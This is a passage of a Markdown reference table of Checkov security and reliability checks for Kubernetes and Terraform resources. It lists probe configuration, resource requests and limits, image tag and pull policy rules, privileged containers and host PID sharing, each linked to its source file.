[LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | -| 2441 | CKV_K8S_8 | resource | Deployment | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | -| 2442 | CKV_K8S_8 | resource | DeploymentConfig | Liveness 
Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | -| 2443 | CKV_K8S_8 | resource | Pod | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | -| 2444 | CKV_K8S_8 | resource | PodTemplate | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | -| 2445 | CKV_K8S_8 | resource | ReplicaSet | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | -| 2446 | CKV_K8S_8 | resource | ReplicationController | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | -| 2447 | CKV_K8S_8 | resource | StatefulSet | Liveness Probe Should be Configured | Kubernetes | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/LivenessProbe.py) | -| 2448 | CKV_K8S_8 | resource | kubernetes_deployment | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | -| 2449 | CKV_K8S_8 | resource | kubernetes_deployment_v1 | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | -| 2450 | CKV_K8S_8 | resource | kubernetes_pod | Liveness Probe Should be Configured | Terraform | 
[LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | -| 2451 | CKV_K8S_8 | resource | kubernetes_pod_v1 | Liveness Probe Should be Configured | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py) | -| 2452 | CKV_K8S_9 | resource | DaemonSet | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | -| 2453 | CKV_K8S_9 | resource | Deployment | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | -| 2454 | CKV_K8S_9 | resource | DeploymentConfig | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | -| 2455 | CKV_K8S_9 | resource | Pod | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | -| 2456 | CKV_K8S_9 | resource | PodTemplate | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | -| 2457 | CKV_K8S_9 | resource | ReplicaSet | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | -| 2458 | CKV_K8S_9 | resource | ReplicationController | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | -| 2459 | CKV_K8S_9 | 
resource | StatefulSet | Readiness Probe Should be Configured | Kubernetes | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadinessProbe.py) | -| 2460 | CKV_K8S_9 | resource | kubernetes_deployment | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | -| 2461 | CKV_K8S_9 | resource | kubernetes_deployment_v1 | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | -| 2462 | CKV_K8S_9 | resource | kubernetes_pod | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | -| 2463 | CKV_K8S_9 | resource | kubernetes_pod_v1 | Readiness Probe Should be Configured | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py) | -| 2464 | CKV_K8S_10 | resource | CronJob | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | -| 2465 | CKV_K8S_10 | resource | DaemonSet | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | -| 2466 | CKV_K8S_10 | resource | Deployment | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | -| 2467 | CKV_K8S_10 | resource | DeploymentConfig | CPU requests should be set | Kubernetes | 
[CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | -| 2468 | CKV_K8S_10 | resource | Job | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | -| 2469 | CKV_K8S_10 | resource | Pod | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | -| 2470 | CKV_K8S_10 | resource | PodTemplate | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | -| 2471 | CKV_K8S_10 | resource | ReplicaSet | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | -| 2472 | CKV_K8S_10 | resource | ReplicationController | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | -| 2473 | CKV_K8S_10 | resource | StatefulSet | CPU requests should be set | Kubernetes | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPURequests.py) | -| 2474 | CKV_K8S_10 | resource | kubernetes_deployment | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | -| 2475 | CKV_K8S_10 | resource | kubernetes_deployment_v1 | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | -| 2476 | CKV_K8S_10 | resource | kubernetes_pod | CPU requests should be set | Terraform | 
[CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | -| 2477 | CKV_K8S_10 | resource | kubernetes_pod_v1 | CPU requests should be set | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py) | -| 2478 | CKV_K8S_11 | resource | CronJob | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | -| 2479 | CKV_K8S_11 | resource | DaemonSet | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | -| 2480 | CKV_K8S_11 | resource | Deployment | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | -| 2481 | CKV_K8S_11 | resource | DeploymentConfig | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | -| 2482 | CKV_K8S_11 | resource | Job | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | -| 2483 | CKV_K8S_11 | resource | Pod | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | -| 2484 | CKV_K8S_11 | resource | PodTemplate | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | -| 2485 | CKV_K8S_11 | resource | ReplicaSet | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | 
-| 2486 | CKV_K8S_11 | resource | ReplicationController | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | -| 2487 | CKV_K8S_11 | resource | StatefulSet | CPU limits should be set | Kubernetes | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/CPULimits.py) | -| 2488 | CKV_K8S_11 | resource | kubernetes_deployment | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | -| 2489 | CKV_K8S_11 | resource | kubernetes_deployment_v1 | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | -| 2490 | CKV_K8S_11 | resource | kubernetes_pod | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | -| 2491 | CKV_K8S_11 | resource | kubernetes_pod_v1 | CPU Limits should be set | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py) | -| 2492 | CKV_K8S_12 | resource | CronJob | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | -| 2493 | CKV_K8S_12 | resource | DaemonSet | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | -| 2494 | CKV_K8S_12 | resource | Deployment | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | -| 2495 | CKV_K8S_12 | 
resource | DeploymentConfig | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | -| 2496 | CKV_K8S_12 | resource | Job | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | -| 2497 | CKV_K8S_12 | resource | Pod | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | -| 2498 | CKV_K8S_12 | resource | PodTemplate | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | -| 2499 | CKV_K8S_12 | resource | ReplicaSet | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | -| 2500 | CKV_K8S_12 | resource | ReplicationController | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | -| 2501 | CKV_K8S_12 | resource | StatefulSet | Memory requests should be set | Kubernetes | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryRequests.py) | -| 2502 | CKV_K8S_12 | resource | kubernetes_deployment | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | -| 2503 | CKV_K8S_12 | resource | kubernetes_deployment_v1 | Memory Limits should be set | Terraform | 
[MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | -| 2504 | CKV_K8S_12 | resource | kubernetes_pod | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | -| 2505 | CKV_K8S_12 | resource | kubernetes_pod_v1 | Memory Limits should be set | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py) | -| 2506 | CKV_K8S_13 | resource | CronJob | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | -| 2507 | CKV_K8S_13 | resource | DaemonSet | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | -| 2508 | CKV_K8S_13 | resource | Deployment | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | -| 2509 | CKV_K8S_13 | resource | DeploymentConfig | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | -| 2510 | CKV_K8S_13 | resource | Job | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | -| 2511 | CKV_K8S_13 | resource | Pod | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | -| 2512 | CKV_K8S_13 | resource | PodTemplate | Memory limits should be set | Kubernetes | 
[MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | -| 2513 | CKV_K8S_13 | resource | ReplicaSet | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | -| 2514 | CKV_K8S_13 | resource | ReplicationController | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | -| 2515 | CKV_K8S_13 | resource | StatefulSet | Memory limits should be set | Kubernetes | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MemoryLimits.py) | -| 2516 | CKV_K8S_13 | resource | kubernetes_deployment | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | -| 2517 | CKV_K8S_13 | resource | kubernetes_deployment_v1 | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | -| 2518 | CKV_K8S_13 | resource | kubernetes_pod | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | -| 2519 | CKV_K8S_13 | resource | kubernetes_pod_v1 | Memory requests should be set | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py) | -| 2520 | CKV_K8S_14 | resource | CronJob | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | -| 2521 | CKV_K8S_14 | resource | 
DaemonSet | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | -| 2522 | CKV_K8S_14 | resource | Deployment | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | -| 2523 | CKV_K8S_14 | resource | DeploymentConfig | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | -| 2524 | CKV_K8S_14 | resource | Job | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | -| 2525 | CKV_K8S_14 | resource | Pod | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | -| 2526 | CKV_K8S_14 | resource | PodTemplate | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | -| 2527 | CKV_K8S_14 | resource | ReplicaSet | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | -| 2528 | CKV_K8S_14 | resource | ReplicationController | Image Tag should be fixed - not latest or blank | Kubernetes | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | -| 2529 | CKV_K8S_14 | resource | StatefulSet | Image Tag should be fixed - not latest or blank | Kubernetes | 
[ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImageTagFixed.py) | -| 2530 | CKV_K8S_14 | resource | kubernetes_deployment | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | -| 2531 | CKV_K8S_14 | resource | kubernetes_deployment_v1 | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | -| 2532 | CKV_K8S_14 | resource | kubernetes_pod | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | -| 2533 | CKV_K8S_14 | resource | kubernetes_pod_v1 | Image Tag should be fixed - not latest or blank | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py) | -| 2534 | CKV_K8S_15 | resource | CronJob | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | -| 2535 | CKV_K8S_15 | resource | DaemonSet | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | -| 2536 | CKV_K8S_15 | resource | Deployment | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | -| 2537 | CKV_K8S_15 | resource | DeploymentConfig | Image Pull Policy should be Always | Kubernetes | 
[ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | -| 2538 | CKV_K8S_15 | resource | Job | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | -| 2539 | CKV_K8S_15 | resource | Pod | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | -| 2540 | CKV_K8S_15 | resource | PodTemplate | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | -| 2541 | CKV_K8S_15 | resource | ReplicaSet | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | -| 2542 | CKV_K8S_15 | resource | ReplicationController | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | -| 2543 | CKV_K8S_15 | resource | StatefulSet | Image Pull Policy should be Always | Kubernetes | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ImagePullPolicyAlways.py) | -| 2544 | CKV_K8S_15 | resource | kubernetes_deployment | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | -| 2545 | CKV_K8S_15 | resource | kubernetes_deployment_v1 | Image Pull Policy should be Always | Terraform | 
[ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | -| 2546 | CKV_K8S_15 | resource | kubernetes_pod | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | -| 2547 | CKV_K8S_15 | resource | kubernetes_pod_v1 | Image Pull Policy should be Always | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py) | -| 2548 | CKV_K8S_16 | resource | CronJob | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | -| 2549 | CKV_K8S_16 | resource | DaemonSet | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | -| 2550 | CKV_K8S_16 | resource | Deployment | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | -| 2551 | CKV_K8S_16 | resource | DeploymentConfig | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | -| 2552 | CKV_K8S_16 | resource | Job | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | -| 2553 | CKV_K8S_16 | resource | Pod | Container should not be privileged | Kubernetes | 
[PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | -| 2554 | CKV_K8S_16 | resource | PodTemplate | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | -| 2555 | CKV_K8S_16 | resource | ReplicaSet | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | -| 2556 | CKV_K8S_16 | resource | ReplicationController | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | -| 2557 | CKV_K8S_16 | resource | StatefulSet | Container should not be privileged | Kubernetes | [PrivilegedContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PrivilegedContainers.py) | -| 2558 | CKV_K8S_16 | resource | kubernetes_deployment | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | -| 2559 | CKV_K8S_16 | resource | kubernetes_deployment_v1 | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | -| 2560 | CKV_K8S_16 | resource | kubernetes_pod | Do not admit privileged containers | Terraform | [PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | -| 2561 | CKV_K8S_16 | resource | kubernetes_pod_v1 | Do not admit privileged containers | Terraform | 
[PrivilegedContainer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainer.py) | -| 2562 | CKV_K8S_17 | resource | CronJob | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | -| 2563 | CKV_K8S_17 | resource | DaemonSet | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | -| 2564 | CKV_K8S_17 | resource | Deployment | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | -| 2565 | CKV_K8S_17 | resource | Job | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | -| 2566 | CKV_K8S_17 | resource | Pod | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | -| 2567 | CKV_K8S_17 | resource | ReplicaSet | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | -| 2568 | CKV_K8S_17 | resource | ReplicationController | Containers should not share the host process ID namespace | Kubernetes | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | -| 2569 | CKV_K8S_17 | resource | StatefulSet | Containers should not share the host process ID namespace | Kubernetes | 
